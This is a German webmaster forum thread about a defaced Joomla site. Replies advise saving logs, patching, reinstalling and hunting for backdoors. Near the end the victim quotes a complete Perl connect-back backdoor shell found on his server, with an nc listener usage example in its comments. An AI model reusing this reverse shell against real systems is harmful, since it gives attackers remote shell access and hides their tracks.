ABAKUS

Hallo,

ich habe gerade festgestellt, dass mein HP gehackt worden ist und jetzt irgednwelche politischen Botschaften von der PKK auf meiner Seite verbreitet werden.Was kann man gegen solchen missbrauch tun.Ausser eine neues noch längeres Passwort sich zu vergeben?

eigener Server?

wie sind sie reingekommen?

und die Löcher dann dicht machen...

Die Ebene auf der du ansetzen kannst hängt davon ab wie du deine seite hostest.
Shared Paket oder Server? Managed oder Root?
In selbiger Reihenfolge der obigen Frage steigen DEINE Möglichkeiten etwas zu tun.

Bei Shared Paketen mußt Du selber gar nicht mal schuld sein.
Twigg

So, wie es aussieht, hast du einen Windows-Server.
Tjo, dieses BS ist für viele Sicherheitslücken bekannt.
Wenn du keinen guten Admin hast, hast du da recht schlechte Karten.


Du solltest immer die aktuellen Software-Release auf deinem Server haben, und fein Updates machen.
Fals deine ASP-Software eine selbstgehäkelte ist, würde ich die grösste Lücke dort vermuten.

Wichtig ist, das Loch aufzuspüren und zu stopfen. Bei vielen Löchern kommt man übrigens um eine Betriebssystem-Neuinstallation nicht umhin, da Rootkits installiert sein könnten, die dem Hacker vollen Zugang durch die Hintertür auf deinen Server erlauben.

Auf alle Fälle schnell das Backup aufspielen. Gerüchtweise findet gerade ein Google-Update statt.

als erstes solltest Du nach dem Aufspielen der Updates
deine Logfiles sichern.
und zwar die direkt von deinem server, nicht das was du vielleicht im Webalizer siehst.

anhand dieser Logfiles kann man oftmals sehen wie dieser Hacker zugriff bekommen hat
Schau Dir dazu erstmal an, wann genau deine index Datei oder vielleicht auch die htaccess geändert wurde,
diese Zeit erleichtert Dir die suche in den Logfiles....

Falls Du mit Deinen Logfiles nicht klarkommst, kannst Du Dich gerne bei mir melden, hab schon einige erfahrrungen damit...

Vielen Dank für die nützlichen Tipps.

Ich habe jetzt erst mal die Logfiles gesichert, und die richtige Index Datei hochgeladen, wenigstens waren diese Leute so "anständig" und haben nicht den Rest auch noch gelöscht. Ich werde mich jetzt erstmal mit meinem Hoster in Verbindung setzen.
Der Hoster ist eigentlich ein kleiner Anbieter.

Benutzt du eine fertige Shopsoftware? Weil wenn es den Jungs einmal möglich war die index zu löschen, dann haben sie sich sicher noch irgendwelche anderen Zugänge gebaut.

Als mein Server mal gehackt wurde hab ich sofort das System komplett platt gemacht und erstmal meinen kompletten Seitencode durchgeforstet nach schwachstellen.

Man weiß nie was die für Backdoor's hinterlassen die Leute.

Ich habe keine Shopsoftware installiert, nur ein CMS.

hast du dein joomla auch immer aktuell gehalten? da gab es gerade ein Update um Sicherheitslücken zu schliessen:

https://www.joomla.de/news/joomla.org/j ... ase_2.html

Ich habe gerade das Sicherheitsrelease aufgespielt und das Gästebuch deaktiviert.
Ich habe mich nochmal bei meinen Arbeitskollegen umgehört. Die hatten auch vor kurzem Hacker Probleme in Verbindung mit Joomla. Der eine meinte, das die über ne SQL Injection Attacke reingekommen sind.
Leider erreiche ich meinen kleinen Hoster erst ab Montag, so nen scheiß.
Ach ja, kann einer von Euch etwas mit "zone-h.org" anfangen. Ich hatte gestern ein paar verweise von dort.

Bei zone-h.org werden Seiten gelistet, die von Hackern z.B. defaced wurden.
Vielleicht ist deine Seite dort auch aufgetaucht.
Wenn ja, hast du nun einige Zeit alle Möchtegern-Hacker auf dem Hals, d.h. immer schön Sicherheitsupdates installieren und Logs beobachten.

Pompom hat geschrieben:So, wie es aussieht, hast du einen Windows-Server.
Tjo, dieses BS ist für viele Sicherheitslücken bekannt.
Wenn du keinen guten Admin hast, hast du da recht schlechte Karten.

Tja, das Problem hatte nichts mit Windows, sondern mit einer OpenSource-Software in Kombination mit einem nicht rechtzeitig aufgespielten Patch zu tun.

Bei Microsoft-Produkten passiert das nicht so leicht - da aktiviert man das automatische Update und wird dann informiert, falls ein neuer Patch da ist.

kann ich mich nur anschliessen: joomla alt + windows = schlaraffenland für jedes scriptkiddie. unbedingt alles löschen, logs sichern, komplett neu installieren + alle patches....hatte ähnliche mal mit einer gehackten version von phpbb....wenn man sowas vorkonfiguriertes nutzt: am besten alle paar wochen nach updates suchen, is wichtig!

Habe jetzt schon mehrfach Angriffe gehabt. Hier einmal ein Auszug aus einer Datei die mir aufgespielt wurde.Weiß einer von Euch was das Bedeutet:
#!/usr/bin/perl
use IO::Socket;
# Priv8 ** Priv8 ** Priv8
# IRAN HACKERS SABOTAGE Connect Back Shell
# code by:LorD
# We Are :LorD-C0d3r-NT-\x90
# Email:LorD@ihsteam.com
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/bash';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF

Mein Hoster ist jetzt dran und ich habe jetzt sämtliche Sicherheitsupdates gefahren.